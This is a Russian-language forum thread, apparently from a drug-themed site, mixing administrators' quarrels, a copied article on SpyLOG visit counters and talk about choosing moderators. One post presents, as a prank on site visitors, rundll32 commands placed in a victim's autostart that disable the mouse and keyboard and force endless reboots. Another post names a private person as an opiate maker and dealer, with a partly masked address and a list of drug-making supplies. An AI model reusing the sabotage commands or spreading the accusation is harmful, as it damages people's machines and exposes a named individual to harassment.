Вопросы Администрации

Arina

Юзер
Дима! Какого хера я не понимаю! Твою мать! Мы с тобой обсуждали по телефону важные вещи! И если у тебя нахлынула параноя после моего звонка, то это ТВОИ проблемы. Это по-меньшей степени не смешно, а по-крайней мере - глупо! Надоело уже. Ну пиздец. То мент....то шпионаж Шелу.... Мне нахуй этот долбоёб не сдался, ещё и что-то ему там доносить!

Кстати. когда мы попрощались по телефону, ты сказал, что прикольно пописдели...... Противно читать после этого твои посты... :x

Arina

Юзер
Я переехала. Сегодня-завтра - последний день с родителями живу. Комп пока что не купила себе новый, так что буду выходить редко на форум, по-крайней мере, месяц точно.

komok

Местный
Arina написал(а):
Кстати. когда мы попрощались по телефону, ты сказал, что прикольно пописдели.
Обычная вежливость, Арина. Тебе бы тоже не повредила, имхо :)
Ни встречаццо, ни по телефону тереть нехочу. Тчка.

Arina

Юзер
komok написал(а):
Arina написал(а):
Кстати. когда мы попрощались по телефону, ты сказал, что прикольно пописдели.
Обычная вежливость, Арина. Тебе бы тоже не повредила, имхо :)
Ни встречаццо, ни по телефону тереть нехочу. Тчка.

Обычная вежливость :lol: :up:

А я с тобой сама не горю желанием встречатся :lol:
Ты сума сведёшь :lol:

Постучись заново в аську, постучись :lol: А это тебе зачем было?
Ты боисся меня! )))) ЛОЛ

Кста, Ком! С тобой Тифани хотела пересечься))) Я сказала, что это просто нереал. :lol:

Arina

Юзер
Если по телефону не хочешь обсуждать, давай здесь.
Я тебе порола про форточку штука RUNDLL32 очень много значит и должен жить по адресу(почти у всех так) C:\windows\rundll32.exe

И ентот милый файлик имеет особенность вырубать машину, клавиатуру, маузу…Ну в общем при правильном обращении никаких троянов не нужно, все уже есть!!! Так вот, с помощью VBScript можно решить юзера по полному западлу. Действует примерно так: решился поц зайти на твою пагу, потом он когда перезагрузился тут и клава не работает, тут и мышь отсутствует... Cамое приятное что после этого нужна винду переустанавливать...Смысл в том, что-бы прописать ему в автозапуск лишь две команды,

1. Отключение мыши: rundll32 mouse,disable

2. Отключение клавы: rundll32 keyboard,disable

И самое обидное: rundll32 shell32,SHExitWindowsEx 2

И погибала я от постоянной перезагрузки

komok

Местный
Вчера поздно вечером я ужинал и смотрел по телику передачу "Петровка 38". И очень мне та передача понравилась! Наши органы наконец-то научились неплохо и правдоподобно себя пиарить, да так, что интересно посмотреть - послушать. Ваще последнее время я вижу положительные тенденции в московской ментовской движухе: меньше доёбываются к прохожим, меньше мздоимства, больше законности. Гыгы, а чо - правда :P
В "Петровке 38" рассказывали про всякое хорошее: и гоп-стопников задержали, и убийц осудили и закрыли, и наркопритоны накрыли. Аж 15 штук наркопритонов! Выступала девушка - сотрудница ФСКН, каментировала. Один из задержанных хозяев наркопритона - запуганый человечек - дал показания перед камерой.
Типо варил он маковые семечки!! А я аж распереживался. Непанимайу, пачему ФСКН те наркопритоны накрыло, а Гришу Косоржецкого не тронуло!
Веть вот инфа, изложил ещё летом. Правда стопроцентовая. Уж я панимайу, что говорю. Фскн четало, к Грише заходили. Но не тронули ублюдка. Тишь мне недавно тёрла, что он продолжает варить. Если Тишь не песдит, то я в полнейшем ахуе. Ну как так может быть, что наглая паскудная сволота походу варит те же семечки, барижит ширкой, все это знают, и у него нет праблем, а у других есть? :fuck:

Вот веть: Косоржецкий Григорий проживает по адресу г. Москва, ул. **** ***** 10, кв. 24. Телефон *******. Варит маковые семечки на кухне этой самой хаты. Системный опиатный наркоман и барыга. У него часто имеются принадлежности для изготовления черняги - шлёнки со следами ширки, растворитель 646, нашатырный спирт, ацетилсалициловая кислота, димедрол и супрастин, уже использованные и еще не использованные маковые семечки и т.д. Сволота достаёт соседей тем, что из его квартиры часто воняет растворителем...

Однако гад живёт себе спокойно пока...

komok

Местный
на иконке в самом низу страницы spylog вторая цифра - типо количество уникумов (не одних и тех же посетителей) в сутки. эта цифра - самая важная :D

komok

Местный
Что говорят цифры на кнопках счетчиков
Зачем ставят кнопки. Рейтинги, счетчики и системы статистики.

Назначение кнопок
Зачем вебмастера ставят на страницы своих сайтов какие-то кнопки? Выделим три главные причины:
1. Чтобы участвовать в рейтинге ресурсов, занимать там по возможности высокие места. Нахождение в первой двадцатке, сотне и т. д. влияет на решение пользователя сети обратиться именно к этим сайтам.
2. Чтобы поисковая машина, родственная данному рейтингу-каталогу, лучше индексировала страницы сайта. Так, Rambler отдает приоритет своим ближним, Яндекс всегда помнит о сайтах Narod.ru.
3. Чтобы получать различную статистическую информацию о посещаемости сайта. Причем данные, передаваемые счетчиками, скорее дополняют статистику, собираемую анализаторами логов — специальными программами, которые следят за обращением к серверу. Коротко отметим, что счетчики собирают меньший объем данных, не видят приходов роботов, программ-качалок и т. п., но это не их вина; зато самые умные из счетчиков обладают большими аналитическими возможностями.

Рейтинги, счетчики и системы статистики
Сначала были рейтинги. Их назначение — сортировать сайты в зависимости от симпатий посетителей («зрительское голосование») или текущего показателя посещаемости (например, хосты и хиты). Rambler, TopList.
Задача счетчиков — сбор и предоставление статистической информации. Они органично вошли в каталоги.
По мере развития технических возможностей программ появились люди, которые сумели создать сложные, эффективные инструменты сбора и анализа статистики посещаемости сайтов. Самый громкий успех выпал на долю российской разработки SpyLOG в 2000 г.
Очень распространено смешение функций каталога, счетчика и рейтинга Rambler.
Вообще для большинства пользователей сети счетчики — это кнопки с цифрами.

Как следует устанавливать кнопки
Участие в большинстве счетчиков бесплатно. Взамен вебмастер обязан поместить на страницы своего сайта кнопки и сделать это надлежащим образом.
Раньше кнопки ставили только на главные страницы сайтов. Почему? Чтобы облегчить жизнь счетчика — одну страницу считать легче, чем все (соотношение примерно 1 к 3–5).
Откуда берется кнопка — она подгружается с удаленного сервера, принадлежащего счетчикам. Счетчик выдает вам код — обычно 10–20 строк программного текста. Код следует поместить в тело файла-документа. Этот код уникален и указывает на ваш сайт. Находятся хитрецы, которые ставят код, выданный только для данного сайта, на другие, что приводит к завышению посещаемости. Бывает и так, что ставят код не на все страницы — тогда счетчик их «пропускает». Теперь понятно, почему многостраничные сайты лучше программировать — имея 2–3 шаблона, вы быстро поменяете коды счетчиков, баннерных сетей и т. д. Имея 50 страниц «сырых» html-документов, вы будете тратить намного больше времени на рутинную, но в то же время достаточно аккуратную операцию.

Расхождения в показаниях
Здесь имеется в виду расхождение в сравнимых показателях: количество посетителей за день и количество посетителей сейчас.
Важнейшая причина - разные алгоритмы подсчета уникальных посетителей.

В системе SpyLOG: Посетитель (visitor; визитор) — Уникальный посетитель — принадлежащий пользователю Сети броузер, установленный на конкретной машине и опознанный Системой Статистики.

Понятие «посетитель» и «уникальный посетитель» не тождественно понятию «конкретный физический человек». Погрешность может достигать 50 процентов и более! Хотя на ресурсах с высокой посещаемостью происходит сглаживание, и погрешность уменьшается.
Нельзя забывать про существование «качальщиков-невидимок», просмотр сохраненных страниц сайтов не пользователями сети и другие случаи, когда люди получают информацию из интернет-источников, ими не пользуясь. Возможно, это даже не имеет отношения к интернет-статистике, но много значит для владельцев сайтов, чьей задачей является создание «влиятельных ресурсов». Вспомните эпизоды, когда телеведущие цитируют сообщения из интернета и показывают веб-страницы на экране вашего телевизора, или интернет-мероприятия с демонстрацией любимых сайтов.
Иногда сервера счетчиков оказываются столь перегруженными, что ваши позывные до них не доходят. В результате вместо кнопки мы наблюдаем пустой прямоугольник или зияющую пустоту. Понятно, что статистика «портится». Такие провалы легко заметить по журналу посещений.
Различия в правилах учета посещений. В целях борьбы с накрутчиками счетчики установили правила обращений к страницам, которые ограничивают период повторной загрузки. Например, если вы обратитесь к одной и той же странице в течение 30 сек., счетчик подумает про вас нехорошее, и отнесет повторную операцию к разряду «перегрузка», т. е. не засчитает ее.
Обычно счетчики дают на выбор несколько десятков кнопок с разными сочетаниями цветов.

SpyLOG
Стандартная кнопка показывает (сверху вниз):
— количество уникальных посетителей всего
— посетителей сегодня
— посетителей в данный момент (онлайн)

Ещё раз повторю! самая верхняя цифра — общее количество независимых посетителей с момента установки счетчика, средняя — количество независимых посетителей за сегодня, нижняя — количество независимых посетителей, находящихся на сайте в настоящий момент.

Кроме того, spylog выдает админам более крупные по размеру кнопки, где добавляются обобщенные данные, но эти кнопки у админов мало популярны.

Адрес сайта системы статистики SpyLOG: www.spylog.ru

komok

Местный
Походу, сегодня tor4ru.com занимает 441 место из 19468 в неофициальном рейтинге spylog "Увлечения, хобби". Я просто это число для себя запесал, чтоб не забыть. количество посетителей растёт из месяца в месяц и рейтинг тоже должен.

Arina

Юзер
Поздравляю, Дмитрий! Это то к чему стремились)) :up: :)

dnb-mafia

Юзер
Слыш Ком, тут тётя Арина в icq ко мне прийшла и попросила у тя уточнить, не забанил ли ты её голубушку... Ато она не могёт авторизовать логин. Вот ! :bye:

komok

Местный
не банил я её. пароль забыла думаю походу. или просто мозги ебёт по своему обыкновению. если чо - сделаю новый пароль и вышлю по аське или ещё как. пешыте.

Arina

Юзер
Афигеть.... Кто-то варит и его не трогают, а кто-то уже всё на свете перепробовал, чтобы ему дали спокойно варить, а нифига что-то не выходит... Потому что, наверное, варит только он :D

Arina

Юзер
komok написал(а):
или просто мозги ебёт по своему обыкновению

Интересно, а зачем она это делает? :D

Arina

Юзер
:up: :up: :up: ПРЕВЕД!

Arina

Юзер
komok написал(а):
Веть вот инфа, изложил ещё летом. Правда стопроцентовая. Уж я панимайу, что говорю

Перевод с албанского: Типа, в полку прибыло. Замануха дубль 2.
Я гений, пускай и злой. Мака хотите? :lol:

komok написал(а):
Если Тишь не песдит, то я в полнейшем ахуе. Ну как так может быть, что наглая паскудная сволота походу варит те же семечки, барижит ширкой, все это знают, и у него нет праблем, а у других есть?

Перевод: Saada только пиво иногда пьёт! Ей можно верить. :lol:
Всё в поряде! Может вам и цены тут выложить на ширево?

komok написал(а):
Вот веть: Косоржецкий Григорий проживает по адресу г. Москва, ул. **** ***** 10, кв. 24. Телефон *******. Варит маковые семечки на кухне этой самой хаты. Системный опиатный наркоман и барыга.
Однако гад живёт себе спокойно пока...

Перевод: Нету выхода - варить не умеете? Купите у Гришки!
МЛЯ! Ну шо не звонил никто давно? :lol:

men-person

Активный Юзер
neo.gif

Arina

Юзер
Дмитрий, слушай, уже беспредел начинается.
:? у меня на химию есть модер хороший.
собеседование на какой день назначить в icq?

komok

Местный
Да какое там собеседование? Если чел энтузиаст - пусть будет. Хотя мож придёт опять кент типо Койота - ты про него тож говорила "кошерный". А он винт и то токо питьевой варит :lol:
Да ещё и понтуеццо при этом, типо "мне в западло тут модерить". пацтуломъ :lol:
Кста, сход-развал тоже может вернуться если хочет. Он ведь не забанен.

З.Ы. Модером быть - по крайней мере время на эту работку нуно тратить.
Бери ношу по себе, чтоб не падать при ходьбе :lol:

Сверху Снизу